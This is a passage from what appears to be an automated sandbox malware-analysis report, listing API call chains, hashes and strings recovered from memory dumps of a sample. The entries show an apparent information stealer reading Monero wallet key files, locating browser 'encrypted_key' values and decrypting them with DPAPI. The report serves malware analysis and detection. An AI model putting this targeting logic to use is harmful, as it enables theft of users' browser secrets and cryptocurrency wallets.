                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 298823f31d94dee4a372aaabe7d6f610075b02b3fa935b124190f9664faf9319
                        • Instruction ID: 349b9625bf9af3457e0b5e6a24aff6fc9145ba1033a0554064c2a0ce40ea9b38
                        • Opcode Fuzzy Hash: 298823f31d94dee4a372aaabe7d6f610075b02b3fa935b124190f9664faf9319
                        • Instruction Fuzzy Hash: 2F8134759101189BDB04FBA2DC92EEE7338BF14301F544229F907B6091EF346A4DEB66
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C61580,00C60D92), ref: 00C4F54C
                        • lstrlen.KERNEL32(00000000), ref: 00C4F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: 93a1fa5929f41e64808df0e31450597f57bf25fa22bfa728ffac952daa762e78
                        • Instruction ID: a4f9ba5c975d13efc507d768464edcbb1925f64ccda707c23e2c7c25abb0191c
                        • Opcode Fuzzy Hash: 93a1fa5929f41e64808df0e31450597f57bf25fa22bfa728ffac952daa762e78
                        • Instruction Fuzzy Hash: AB513079D10108AADB04FBB1DC92DED7738BF54301F408628FC16A7191EE346A4DEBA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: b3f24be2456e15c17423d20275c23479907df6bba8043813fcc9ae4829816dcf
                        • Instruction ID: a3023d21b7ac51e91c425dd2db176db04c19d7059b535699f6fc10cd5f9c70fe
                        • Opcode Fuzzy Hash: b3f24be2456e15c17423d20275c23479907df6bba8043813fcc9ae4829816dcf
                        • Instruction Fuzzy Hash: E8414075D10108AFCB04EFE5C885AEEB774BF54305F148128F816B6290EB74AA49DFA6
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C49D39
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49AEF
                          • Part of subcall function 00C49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C44EEE,00000000,?), ref: 00C49B01
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49B2A
                          • Part of subcall function 00C49AC0: LocalFree.KERNEL32(?,?,?,?,00C44EEE,00000000,?), ref: 00C49B3F
                          • Part of subcall function 00C49B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C49B84
                          • Part of subcall function 00C49B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C49BA3
                          • Part of subcall function 00C49B60: LocalFree.KERNEL32(?), ref: 00C49BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: d725f8ec1e95f454aeab64fcd3265e00e6659fba28c7e31f6a6938a8a40e67e3
                        • Instruction ID: 8952294d41e2220ed0f5897229ae6bc3fa17ccb6c29567181b26e9ba684a2031
                        • Opcode Fuzzy Hash: d725f8ec1e95f454aeab64fcd3265e00e6659fba28c7e31f6a6938a8a40e67e3
                        • Instruction Fuzzy Hash: A3315EB6D10219ABCF14DFE4DC85AEFB7B8FF48304F144529E915A7241EB309A44CBA1
                        APIs
                        • CreateFileA.KERNEL32(00C53AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C53AEE,?), ref: 00C592FC
                        • GetFileSizeEx.KERNEL32(000000FF,00C53AEE), ref: 00C59319
                        • CloseHandle.KERNEL32(000000FF), ref: 00C59327
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: f979b68b68772fdd1d0ed049cfa1a73528468470da641a32f2bf7b3cc1e018f5
                        • Instruction ID: a587b3bb16fcd87ed79efd9541982c49523305a33b34266eae4dfbb9e288273a
                        • Opcode Fuzzy Hash: f979b68b68772fdd1d0ed049cfa1a73528468470da641a32f2bf7b3cc1e018f5
                        • Instruction Fuzzy Hash: A0F08C38E00208FFEB10DBB2DC08B9E77B9EB48311F1082A5BA15A72D0D6B196449B44
                        APIs
                        • __getptd.LIBCMT ref: 00C5C74E
                          • Part of subcall function 00C5BF9F: __amsg_exit.LIBCMT ref: 00C5BFAF
                        • __getptd.LIBCMT ref: 00C5C765
                        • __amsg_exit.LIBCMT ref: 00C5C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00C5C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 7006e327c021dfb056fddafb93acda1549dc721f1f4a7b6928d3e5de7bf4caee
                        • Instruction ID: 977b8a299ad47eed96c31615c783949ad15d82ed7c217d5e7076bd814f410788
                        • Opcode Fuzzy Hash: 7006e327c021dfb056fddafb93acda1549dc721f1f4a7b6928d3e5de7bf4caee
                        • Instruction Fuzzy Hash: B7F0903E9007109FD730BBF9588674D37A0AF04767F244249FC14A65D2CB645EC8AE5E
                        APIs
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54F7A
                        • lstrcat.KERNEL32(?,00C61070), ref: 00C54F97
                        • lstrcat.KERNEL32(?,0089AFA8), ref: 00C54FAB
                        • lstrcat.KERNEL32(?,00C61074), ref: 00C54FBD
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C5492C
                          • Part of subcall function 00C54910: FindFirstFileA.KERNEL32(?,?), ref: 00C54943
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FDC), ref: 00C54971
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FE0), ref: 00C54987
                          • Part of subcall function 00C54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C54B7D
                          • Part of subcall function 00C54910: FindClose.KERNEL32(000000FF), ref: 00C54B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 224ea9e827efa9a4e69a9487d4ba49663ca17ad8862bdcdb2e723e9f089a99ae
                        • Instruction ID: 23de9faaf882eb411cfe1f18e29827abc2adf7f85e66123170c2a56fe241678f
                        • Opcode Fuzzy Hash: 224ea9e827efa9a4e69a9487d4ba49663ca17ad8862bdcdb2e723e9f089a99ae
                        • Instruction Fuzzy Hash: 0021DD7A9002046BD754FBB0DC47EED333CA754701F044565BA9DA2181EE7496CC9BA2